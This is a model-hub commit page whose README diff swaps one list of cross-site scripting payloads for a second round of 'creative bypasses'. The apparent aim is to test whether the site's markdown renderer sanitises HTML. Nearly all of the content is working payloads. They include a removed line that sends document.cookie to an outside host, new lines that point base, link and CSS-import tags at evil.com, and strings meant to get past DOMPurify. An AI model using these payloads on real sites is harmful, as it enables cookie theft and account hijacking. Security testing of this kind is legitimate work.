FIRSTACCOUNT69
/

test-hunt-2

Safetensors

test

Model card Files Files and versions

xet

Community

FIRSTACCOUNT69 commited on 3 days ago

Commit

a5da306

verified ·

1 Parent(s): f5139fc

XSS round 2 - creative bypasses

Browse files

Files changed (1) hide show

README.md +37 -51

README.md CHANGED Viewed

@@ -1,71 +1,57 @@
 ---
 license: mit
 ---
-# XSS Test Model
-## Normal content first
-This is a test model with various XSS payloads embedded.
-## Test 1: Image onerror
-<img src=x onerror="fetch('https://xss.test/'+document.cookie)">
-## Test 2: SVG onload
-<svg onload="alert(1)">
-## Test 3: Details/Summary
-<details open ontoggle="alert('details')">
-<summary>Click</summary>
-test
-</details>
-## Test 4: Math tag
-<math><mi xlink:href="javascript:alert(1)">test</mi></math>
-## Test 5: Video
-<video src=x onerror="alert('video')">
-## Test 6: Marquee
-<marquee onstart="alert('marquee')">test</marquee>
-## Test 7: Input autofocus
-<input autofocus onfocus="alert('input')">
-## Test 8: Body
-<body onload="alert('body')">
-## Test 9: iframe srcdoc
-<iframe srcdoc="<script>alert('iframe')</script>">
-## Test 10: Object data
-<object data="javascript:alert('object')">
-## Test 11: Link tag
-<link rel="import" href="data:text/html,<script>alert('link')</script>">
-## Test 12: Style injection
-<div style="background:url('javascript:alert(1)')">styled</div>
-## Test 13: Custom element
-<custom-tag onmouseover="alert('custom')">hover me</custom-tag>
-## Test 14: Anchor with JS
-[Click me](javascript:alert('anchor'))
-## Test 15: Markdown image with JS
-![alt](javascript:alert('mdimg'))
-## Test 16: HTML entity bypass
-<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
-## Test 17: Data URI
-<a href="data:text/html,<script>alert(1)</script>">data uri</a>
-## Test 18: Form action
-<form action="javascript:alert('form')"><button>Submit</button></form>
-## Test 19: Meta refresh
-<meta http-equiv="refresh" content="0;url=javascript:alert('meta')">
-## Test 20: Template
-<template><script>alert('template')</script></template>

 ---
 license: mit
 ---
+# XSS Round 2
+## Test A: SVG animate
+<svg><animate onbegin="alert(1)" attributeName="x" dur="1s">
+## Test B: SVG set
+<svg><set attributeName="onmouseover" to="alert(1)">
+## Test C: SVG foreignObject
+<svg><foreignObject><body onload="alert(1)"></body></foreignObject></svg>
+## Test D: SVG use external
+<svg><use href="data:image/svg+xml,<svg onload=alert(1)>"></use></svg>
+## Test E: Style tag
+<style>body{background:red}</style>
+## Test F: Base tag
+<base href="https://evil.com/">
+## Test G: Object with SVG
+<embed src="data:image/svg+xml,<svg onload=alert(1)>">
+## Test H: Anchor target
+<a href="https://evil.com" target="_blank" rel="">Click me</a>
+## Test I: noscript
+<noscript><img src=x onerror=alert(1)></noscript>
+## Test J: CSS import
+<style>@import url("https://evil.com/steal.css")</style>
+## Test K: MathJax/KaTeX
+$$\href{javascript:alert(1)}{click}$$
+## Test L: Tab/newline bypass
+<img src=x on	error="alert(1)">
+<a hre	f="javascript:alert(1)">test</a>
+## Test M: HTML comment bypass
+<img src=x onerror="alert(1)"--!>
+## Test N: Mutation XSS
+<svg><style><img src=x onerror=alert(1)>
+## Test O: DOMPurify bypass attempts
+<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
+<math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
+## Test P: noembed
+<noembed><img src=x onerror=alert(1)></noembed>
+## Test Q: Title element
+<svg><title><img src=x onerror=alert(1)></title></svg>